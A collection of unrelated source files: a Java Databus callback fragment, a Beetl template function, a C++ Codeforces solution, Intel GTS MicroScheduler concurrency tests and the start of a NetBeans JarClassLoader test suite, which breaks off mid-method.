_sourceSchema = sourceSchema;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrapSource(_source, _sourceSchema);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
| 10,841 |
package org.beetl.ext.fn;
import org.beetl.core.Context;
import org.beetl.core.Function;
/**
 * Dynamically references a global variable whose name is computed at render
 * time, e.g. {@code dynamic(a + "_index")}.
 *
 * @author xiandafu
 */
public class DynamicGlobalValueFunction implements Function {

	@Override
	public Object call(Object[] paras, Context ctx) {
		// First argument is the (computed) name of the global variable.
		final String varName = (String) paras[0];
		return ctx.globalVar.get(varName);
	}
}
| 149 |
// <reponame>kamal1316/competitive-programming
// https://codeforces.com/contest/1536/problem/B
#include <bits/stdc++.h>
using namespace std;
using ll = long long;
string s;
string ans;
void search() {
if (s.find(ans) == string::npos) return;
int n = ans.size();
if (ans.back() == 'z') {
int i = 0;
while (i < n) {
if (ans[n - i - 1] == 'z') i++;
else
break;
}
if (i == n) {
for (int j = 0; j < n; j++) ans[j] = 'a';
ans.push_back('a');
search();
return;
}
ans[n - i - 1]++;
for (int j = 0; j < i; j++) ans[n - j - 1] = 'a';
search();
return;
}
ans[n - 1]++;
search();
}
// Reads T test cases; for each, prints the shortlex-smallest string that is
// not a substring of the given string.
int main() {
    std::ios::sync_with_stdio(false);
    std::cin.tie(nullptr);

    int caseCount = 0;
    std::cin >> caseCount;
    for (int tc = 0; tc < caseCount; ++tc) {
        int len = 0;           // declared length of s (read but unused)
        std::cin >> len >> s;
        ans = "a";             // start the scan from the smallest candidate
        search();
        std::cout << ans << '\n';
    }
    return 0;
}
| 418 |
417 | /*******************************************************************************
* Copyright 2019 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files(the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions :
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include <cstdlib>
#include <thread>
#include <functional>
#include "gts/platform/Atomic.h"
#include "gts/analysis/Trace.h"
#include "gts/micro_scheduler/WorkerPool.h"
#include "gts/micro_scheduler/MicroScheduler.h"
#include "SchedulerTestsCommon.h"
using namespace gts;
namespace testing {
using WorkFunc = std::function<void(MicroScheduler&)>;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// INIT/SHUTDOWN TESTS:
//------------------------------------------------------------------------------
// Verifies that many MicroSchedulers can attach to a single WorkerPool from
// the same thread and be shut down independently.
TEST(MicroScheduler, initializeMultipleSameThread)
{
    WorkerPool workerPool;
    workerPool.initialize();

    constexpr uint32_t NUM_SCHEDULERS = 10;
    MicroScheduler taskScheduler[NUM_SCHEDULERS];
    for (uint32_t ii = 0; ii < NUM_SCHEDULERS; ++ii)
    {
        bool result = taskScheduler[ii].initialize(&workerPool);
        ASSERT_TRUE(result);
    }

    for (uint32_t ii = 0; ii < NUM_SCHEDULERS; ++ii)
    {
        taskScheduler[ii].shutdown();
    }

    // Fix: explicitly shut the pool down, matching the cleanup performed by
    // every other test in this file instead of relying on the destructor.
    workerPool.shutdown();
}
//------------------------------------------------------------------------------
// Runs `fcnWork` concurrently on `schedulerCount + 1` MicroSchedulers (one
// per spawned thread plus one on the calling thread), all sharing a single
// WorkerPool with `threadCount` workers. Two spin-wait barriers make every
// scheduler initialize before any of them starts working.
void TestMultipleSchedulers(
    const uint32_t threadCount,
    const uint32_t schedulerCount,
    WorkFunc& fcnWork)
{
    WorkerPool workerPool;
    workerPool.initialize(threadCount);

    MicroScheduler taskScheduler;
    taskScheduler.initialize(&workerPool);

    gts::Vector<std::thread*> threads(schedulerCount);

    // Barrier flags/counters coordinating the init and work phases below.
    std::atomic<bool> startInitialize = { false };
    std::atomic<uint32_t> initCount = { 0 };
    std::atomic<bool> startWork = { false };
    std::atomic<uint32_t> shutdownCount = { 0 };

    for (uint32_t ii = 0; ii < schedulerCount; ++ii)
    {
        // NOTE: [&] is safe here because the lambda only touches the shared
        // locals above, which outlive the join at the end of this function.
        std::thread* pThread = new std::thread([&]()
        {
            MicroScheduler taskScheduler;  // per-thread scheduler (shadows outer one)
            // Phase 1: wait for the go signal, then initialize.
            while (!startInitialize.load(std::memory_order::memory_order_acquire))
            {
                GTS_PAUSE();
            }
            taskScheduler.initialize(&workerPool);
            ++initCount;
            // Phase 2: wait until all schedulers are initialized, then work.
            while (!startWork.load(std::memory_order::memory_order_acquire))
            {
                GTS_PAUSE();
            }
            fcnWork(taskScheduler);
            taskScheduler.shutdown();
            ++shutdownCount;
        });
        threads[ii] = pThread;
    }

    // Release phase 1 and wait for every thread to finish initializing.
    startInitialize = true;
    while (initCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
    {
        GTS_PAUSE();
    }
    // Release phase 2; the calling thread participates in the work too.
    startWork = true;
    fcnWork(taskScheduler);
    taskScheduler.shutdown();

    // Wait for all worker-thread schedulers to shut down before the pool goes.
    while(shutdownCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
    {
        GTS_PAUSE();
    }

    workerPool.shutdown();

    for (uint32_t ii = 0; ii < schedulerCount; ++ii)
    {
        threads[ii]->join();
        delete threads[ii];
    }
}
//------------------------------------------------------------------------------
// No-op work function for tests that only exercise scheduler init/shutdown.
WorkFunc EmptyWork = [](MicroScheduler&)
{};
//------------------------------------------------------------------------------
// Init/shutdown stress: 1 worker thread, 1 extra scheduler thread, no work.
TEST(MicroScheduler, testInitShutownWorker1Scheduler)
{
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = 1;

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, EmptyWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Init/shutdown stress: N worker threads, 1 extra scheduler thread, no work.
TEST(MicroScheduler, testInitShutownNWorker1Schedulers)
{
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = 1;

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, EmptyWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Init/shutdown stress: 1 worker thread, N extra scheduler threads, no work.
TEST(MicroScheduler, testInitShutown1WorkerNSchedulers)
{
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, EmptyWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Init/shutdown stress: N worker threads, N extra scheduler threads, no work.
TEST(MicroScheduler, testInitShutownNWorkerNSchedulers)
{
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, EmptyWork);
        MicroScheduler::resetIdGenerator();
    }
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// SPAWN TESTS:
// Per-worker counter padded to a full cache line so that concurrent
// increments from different worker threads do not false-share.
struct alignas(GTS_NO_SHARING_CACHE_LINE_SIZE) AlignedCounter
{
    gts::Atomic<uint32_t> counter;
    // Explicit padding out to the cache-line size.
    char pad[GTS_NO_SHARING_CACHE_LINE_SIZE - sizeof(gts::Atomic<uint32_t>)];
};
////////////////////////////////////////////////////////////////////////////////
// Leaf task: increments the counter slot belonging to the worker that
// executes it, so tests can total up how many tasks actually ran.
struct TaskCounter : public Task
{
    // `taskCountByThreadIdx` must point at one AlignedCounter per worker.
    TaskCounter(AlignedCounter* taskCountByThreadIdx)
        : taskCountByThreadIdx(taskCountByThreadIdx)
    {}

    //--------------------------------------------------------------------------
    // Count the task when it's executed.
    Task* execute(TaskContext const& ctx)
    {
        // Index by the local id of the executing worker; release pairs with
        // the acquire load in SpawnTasks' final tally.
        taskCountByThreadIdx[ctx.workerId.localId()].counter.fetch_add(1, memory_order::release);
        return nullptr;
    }

    AlignedCounter* taskCountByThreadIdx;  // non-owning; outlives the task
};
////////////////////////////////////////////////////////////////////////////////
// Root task for TestSpawnTask: fans out `numTasks` TaskCounter children and
// blocks until they have all completed.
struct TaskCounterGenerator : public Task
{
    //--------------------------------------------------------------------------
    // Root task for TestSpawnTask
    Task* execute(TaskContext const& ctx)
    {
        // One reference per child; the extra +1 presumably keeps this task
        // alive through waitForAll() -- confirm against the Task ref docs.
        addRef(numTasks + 1);
        for (uint32_t ii = 0; ii < numTasks; ++ii)
        {
            Task* pTask = ctx.pMicroScheduler->allocateTask<TaskCounter>(taskCountByThreadIdx);
            addChildTaskWithoutRef(pTask);  // ref already accounted for above
            ctx.pMicroScheduler->spawnTask(pTask);
        }
        waitForAll();  // block until every child has executed
        return nullptr;
    }

    uint32_t numTasks;                     // number of children to spawn
    AlignedCounter* taskCountByThreadIdx;  // shared per-worker tally, non-owning
};
//------------------------------------------------------------------------------
// Spawns `numTasks` counting tasks through `taskScheduler` and asserts that
// every one of them executed. `threadCount` sizes the per-worker tally.
void SpawnTasks(MicroScheduler& taskScheduler, const uint32_t numTasks, const uint32_t threadCount)
{
    // Create a counter per thread.
    std::vector<AlignedCounter> taskCountByThreadIdx(threadCount);
    for (auto& counter : taskCountByThreadIdx)
    {
        counter.counter.store(0, memory_order::release);
    }

    // Fan out all the work from a single root task and wait for completion.
    TaskCounterGenerator* pRootTask = taskScheduler.allocateTask<TaskCounterGenerator>();
    pRootTask->numTasks = numTasks;
    pRootTask->taskCountByThreadIdx = taskCountByThreadIdx.data();
    taskScheduler.spawnTaskAndWait(pRootTask);

    // Total up the counters
    uint32_t numTasksCompleted = 0;
    for (auto& counter : taskCountByThreadIdx)
    {
        numTasksCompleted += counter.counter.load(memory_order::acquire);
    }

    // Verify all the tasks ran.
    ASSERT_EQ(numTasks, numTasksCompleted);
}
//------------------------------------------------------------------------------
// Spawn stress: 1 worker thread, 1 extra scheduler thread.
TEST(MicroScheduler, testSpawn1Worker1Scheduler)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = 1;

    // Each scheduler spawns `taskCount` tasks and verifies they all ran.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Spawn stress: N worker threads, 1 extra scheduler thread.
TEST(MicroScheduler, testSpawnNWorker1Scheduler)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = 1;

    // Each scheduler spawns `taskCount` tasks and verifies they all ran.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Spawn stress: 1 worker thread, N extra scheduler threads.
TEST(MicroScheduler, testSpawn1WorkerNSchedulers)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    // Each scheduler spawns `taskCount` tasks and verifies they all ran.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Spawn stress: N worker threads, N extra scheduler threads.
TEST(MicroScheduler, testSpawnNWorkerNSchedulers)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    // Each scheduler spawns `taskCount` tasks and verifies they all ran.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulers(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// REGISTER/UNREGISTER TESTS:
//------------------------------------------------------------------------------
// Repeatedly registers/unregisters MicroSchedulers against one shared
// WorkerPool while running `fcnWork` on each, from `schedulerCount` spawned
// threads plus the calling thread, to shake out registration races.
void TestMultipleSchedulersRegistrationAndWork(
    const uint32_t threadCount,
    const uint32_t schedulerCount,
    WorkFunc& fcnWork)
{
    WorkerPool workerPool;
    workerPool.initialize(threadCount);

    gts::Vector<std::thread*> threads(schedulerCount);
    std::atomic<uint32_t> shutdownCount = { 0 };

    // Number of init/work/shutdown cycles each participant performs.
    constexpr uint32_t iterations = 20;

    for (uint32_t ii = 0; ii < schedulerCount; ++ii)
    {
        // NOTE: [&] is safe here; the lambda only uses shared locals that
        // outlive the join at the end of this function.
        std::thread* pThread = new std::thread([&]()
        {
            for (uint32_t iter = 0; iter < iterations; ++iter)
            {
                MicroScheduler taskScheduler;
                taskScheduler.initialize(&workerPool);
                fcnWork(taskScheduler);
                taskScheduler.shutdown();
            }
            ++shutdownCount;
        });
        threads[ii] = pThread;
    }

    // The calling thread runs the same register/work/unregister cycles.
    for (uint32_t iter = 0; iter < iterations; ++iter)
    {
        MicroScheduler taskScheduler;
        taskScheduler.initialize(&workerPool);
        fcnWork(taskScheduler);
        taskScheduler.shutdown();
    }

    // Wait for every spawned thread to finish before shutting the pool down.
    while(shutdownCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
    {
        GTS_PAUSE();
    }

    workerPool.shutdown();

    for (uint32_t ii = 0; ii < schedulerCount; ++ii)
    {
        threads[ii]->join();
        delete threads[ii];
    }
}
//------------------------------------------------------------------------------
// Registration stress: 1 worker thread, 1 extra scheduler thread.
TEST(MicroScheduler, testRegisterAndWork1Worker1Scheduler)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = 1;

    // Each registration cycle spawns `taskCount` tasks and verifies them.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulersRegistrationAndWork(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Registration stress: N worker threads, 1 extra scheduler thread.
TEST(MicroScheduler, testRegisterAndWorkNWorker1Scheduler)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = 1;

    // Each registration cycle spawns `taskCount` tasks and verifies them.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulersRegistrationAndWork(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Registration stress: 1 worker thread, N extra scheduler threads.
TEST(MicroScheduler, testRegisterAndWork1WorkerNSchedulers)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = 1;
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    // Each registration cycle spawns `taskCount` tasks and verifies them.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulersRegistrationAndWork(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
//------------------------------------------------------------------------------
// Registration stress: N worker threads, N extra scheduler threads.
TEST(MicroScheduler, testRegisterAndWorkNWorkerNSchedulers)
{
    const uint32_t taskCount      = TEST_DEPTH;
    const uint32_t workerCount    = gts::Thread::getHardwareThreadCount();
    const uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();

    // Each registration cycle spawns `taskCount` tasks and verifies them.
    WorkFunc spawnWork = [&](MicroScheduler& scheduler)
    {
        SpawnTasks(scheduler, taskCount, workerCount);
    };

    for (uint32_t iter = 0; iter < ITERATIONS_CONCUR; ++iter)
    {
        GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
        TestMultipleSchedulersRegistrationAndWork(workerCount, schedulerCount, spawnWork);
        MicroScheduler::resetIdGenerator();
    }
}
} // namespace testing
| 5,800 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans;
import java.io.DataInputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.Serializable;
import java.net.JarURLConnection;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.util.Collections;
import java.util.Enumeration;
import java.util.List;
import java.util.Set;
import java.util.concurrent.Semaphore;
import java.util.jar.JarFile;
import java.util.jar.Manifest;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.security.Permission;
import java.util.Map;
import junit.framework.AssertionFailedError;
import org.netbeans.junit.NbTestCase;
import org.openide.util.Utilities;
import org.openide.util.lookup.Lookups;
import org.openide.util.test.TestFileUtils;
/** Tests that cover some basic aspects of a Proxy/JarClassLoader.
*
* @author <NAME>
*/
public class JarClassLoaderTest extends NbTestCase {
private static Logger LOGGER = Logger.getLogger(ProxyClassLoader.class.getName());
/** Creates the test case. @param name the test method to run */
public JarClassLoaderTest(String name) {
    super(name);
}
@Override
protected void setUp() throws Exception {
    // Silence ProxyClassLoader logging so test output stays readable.
    LOGGER.setUseParentHandlers(false);
    LOGGER.setLevel(Level.OFF);
    // Each test builds its own JARs/dirs in a clean working directory.
    clearWorkDir();
}
/**
 * Resources in the JAR's default (root) package must be reachable through
 * both getResourceAsStream and getResources, with and without a leading '/'.
 */
public void testCanLoadFromDefaultPackage() throws Exception {
    File jar = new File(getWorkDir(), "default-package-resource.jar");
    TestFileUtils.writeZipFile(jar, "resource.txt:content", "package/resource.txt:content");
    JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
    assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
    assertURLsContent(jcl.getResources("package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("resource.txt"), "content");
    assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
/**
 * A ProxyClassLoader should only delegate a resource lookup to child loaders
 * whose JARs can actually contain it; the query counters verify that JARs
 * without the requested root resource are never consulted.
 */
public void testKnowsWhichJarsHaveDefaultPackage() throws Exception {
    final File nothing = new File(getWorkDir(), "nothing.jar");
    TestFileUtils.writeZipFile(nothing, "package/resource.txt:content");
    final File a1 = new File(getWorkDir(), "a1.jar");
    TestFileUtils.writeZipFile(a1, "A.txt:A", "package/resourceA.txt:content");
    final File a2 = new File(getWorkDir(), "a2.jar");
    TestFileUtils.writeZipFile(a2, "A.txt:A2", "package/resourceA2.txt:content");
    final File b = new File(getWorkDir(), "b.jar");
    TestFileUtils.writeZipFile(b, "B.txt:B", "package/resourceB.txt:content");
    // JarClassLoader subclass that counts how many times it is queried.
    class CntJCL extends JarClassLoader {
        int queried;
        public CntJCL(List<File> files, ClassLoader[] parents) {
            super(files, parents);
        }
        @Override
        public URL findResource(String name) {
            queried++;
            return super.findResource(name);
        }
        @Override
        public Enumeration<URL> findResources(String name) {
            queried++;
            return super.findResources(name);
        }
    }
    final CntJCL[] arr = new CntJCL[] {
        new CntJCL(Collections.singletonList(nothing), new ClassLoader[0]),
        new CntJCL(Collections.singletonList(a1), new ClassLoader[0]),
        new CntJCL(Collections.singletonList(a2), new ClassLoader[0]),
        new CntJCL(Collections.singletonList(b), new ClassLoader[0]),
    };
    ProxyClassLoader pcl = new ProxyClassLoader(arr, true);
    // Looking up A.txt must touch only the two JARs that contain it.
    assertURLsContent(pcl.getResources("A.txt"), "A", "A2");
    assertEquals("No query to nothing.jar", 0, arr[0].queried);
    assertEquals("One query to a1.jar", 1, arr[1].queried);
    assertEquals("One query to a2.jar", 1, arr[2].queried);
    assertEquals("No query to b.jar", 0, arr[3].queried);
    // Looking up B.txt must touch only b.jar; earlier counters stay put.
    assertURLsContent(pcl.getResources("B.txt"), "B");
    assertEquals("No query to nothing.jar", 0, arr[0].queried);
    assertEquals("Still One query to a1.jar", 1, arr[1].queried);
    assertEquals("Still One query to a2.jar", 1, arr[2].queried);
    assertEquals("One query to b.jar now", 1, arr[3].queried);
}
/** Old Covered-Packages format: no explicit "default/..." entry. */
public void testCanLoadFromDefaultPackageCachedOldFormat() throws Exception {
    doCanLoadCached("META-INF,/MANIFEST.MF,package");
}
/** Current Covered-Packages format: includes the "default/..." entry. */
public void testCanLoadFromDefaultPackageCached() throws Exception {
    doCanLoadCached("META-INF,/MANIFEST.MF,package,default/resource.txt");
}
/**
 * Builds a JAR whose manifest declares the given Covered-Packages value and
 * verifies default-package resources still resolve when the JarClassLoader
 * uses that cached package information.
 *
 * @param covPkg value for the manifest's Covered-Packages attribute
 */
private void doCanLoadCached(String covPkg) throws Exception {
    final File jar = new File(getWorkDir(), "default-package-resource-cached.jar");
    TestFileUtils.writeZipFile(jar, "resource.txt:content", "package/resource.txt:content",
            "META-INF/MANIFEST.MF:OpenIDE-Module: x.y.z\nCovered-Packages: " + covPkg + ",\n"
    );
    MockModuleInstaller inst = new MockModuleInstaller();
    MockEvents ev = new MockEvents();
    ModuleManager mm = new ModuleManager(inst, ev);
    // Minimal Module stub: only getManifest() is ever called by the loader;
    // every other operation is intentionally unsupported.
    Module fake = new Module(mm, null, null, null) {
        public List<File> getAllJars() {throw new UnsupportedOperationException();}
        public void setReloadable(boolean r) { throw new UnsupportedOperationException();}
        public void reload() throws IOException { throw new UnsupportedOperationException();}
        protected void classLoaderUp(Set<Module> parents) throws IOException {throw new UnsupportedOperationException();}
        protected void classLoaderDown() { throw new UnsupportedOperationException();}
        protected void cleanup() { throw new UnsupportedOperationException();}
        protected void destroy() { throw new UnsupportedOperationException("Not supported yet.");}
        public boolean isFixed() { throw new UnsupportedOperationException("Not supported yet.");}
        public Object getLocalizedAttribute(String attr) { throw new UnsupportedOperationException("Not supported yet.");}
        public Manifest getManifest() {
            try {
                return new JarFile(jar, false).getManifest();
            } catch (IOException ex) {
                throw new AssertionFailedError(ex.getMessage());
            }
        }
    };
    JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0], false, fake);
    assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
    assertURLsContent(jcl.getResources("package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("resource.txt"), "content");
    assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
/**
 * Same default-package lookups as testCanLoadFromDefaultPackage, but backed
 * by a plain directory instead of a JAR file.
 */
public void testCanLoadFromDefaultPackageDirs() throws Exception {
    File dir = getWorkDir();
    TestFileUtils.writeFile(new File(dir, "resource.txt"), "content");
    TestFileUtils.writeFile(new File(dir, "package/resource.txt"), "content");
    TestFileUtils.writeFile(new File(dir, "META-INF/services/resource.txt"), "content");
    JarClassLoader jcl = new JarClassLoader(Collections.singletonList(dir), new ProxyClassLoader[0]);
    assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("META-INF/services/resource.txt"), "content");
    assertStreamContent(jcl.getResourceAsStream("/META-INF/services/resource.txt"), "content");
    assertURLsContent(jcl.getResources("package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
    assertURLsContent(jcl.getResources("resource.txt"), "content");
    assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
/**
 * URLs handed out by JarClassLoader must behave as real JarURLConnections:
 * correct escaping of spaces in entry names, entry metadata, and access to
 * the manifest and the underlying JAR file.
 */
public void testJarURLConnection() throws Exception {
    File jar = new File(getWorkDir(), "default-package-resource.jar");
    TestFileUtils.writeZipFile(jar, "META-INF/MANIFEST.MF:Manifest-Version: 1.0\nfoo: bar\n\n", "package/re source++.txt:content");
    JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
    URL url = jcl.getResource("package/re source++.txt");
    // The space is URL-escaped; '+' must stay as-is in the path part.
    assertTrue(url.toString(), url.toString().endsWith("default-package-resource.jar!/package/re%20source++.txt"));
    URLConnection conn = url.openConnection();
    assertEquals(7, conn.getContentLength());
    assertTrue(conn instanceof JarURLConnection);
    JarURLConnection jconn = (JarURLConnection) conn;
    assertEquals("package/re source++.txt", jconn.getEntryName());
    assertEquals(Utilities.toURI(jar).toURL(), jconn.getJarFileURL());
    assertEquals("bar", jconn.getMainAttributes().getValue("foo"));
    assertEquals(jar.getAbsolutePath(), jconn.getJarFile().getName());
}
/** Same expectations as testJarURLConnection, but the JAR is supplied after
 * construction through addURL() instead of via the constructor list. */
public void testAddURLMethod() throws Exception {
    File moduleJar = new File(getWorkDir(), "default-package-resource.jar");
    TestFileUtils.writeZipFile(moduleJar,
            "META-INF/MANIFEST.MF:Manifest-Version: 1.0\nfoo: bar\n\n",
            "package/re source++.txt:content");
    // Start with an empty loader and register the JAR dynamically.
    JarClassLoader loader = new JarClassLoader(Collections.<File>emptyList(), new ProxyClassLoader[0]);
    loader.addURL(Utilities.toURI(moduleJar).toURL());
    URL resource = loader.getResource("package/re source++.txt");
